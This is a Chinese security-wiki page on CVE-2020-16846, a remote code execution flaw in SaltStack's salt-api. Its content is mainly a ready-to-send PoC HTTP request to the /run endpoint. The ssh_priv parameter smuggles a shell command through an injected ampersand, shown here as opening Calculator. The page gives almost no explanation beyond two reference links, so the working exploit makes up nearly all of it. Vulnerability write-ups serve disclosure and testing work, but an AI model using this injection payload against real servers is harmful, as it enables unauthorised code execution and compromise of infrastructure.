menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right CVE-2020-16846 SaltStack远程执行代码漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2020-16846 SaltStack远程执行代码漏洞.md
    537 B / 2021-05-21 09:14:38
        # CVE-2020-16846 SaltStack远程执行代码漏洞


```
PoC:

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
```

![](media/16097302977098/16097303099460.jpg)


ref:

https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/

https://forum.ywhack.com/thread-114703-1-4.html
    links
    file_download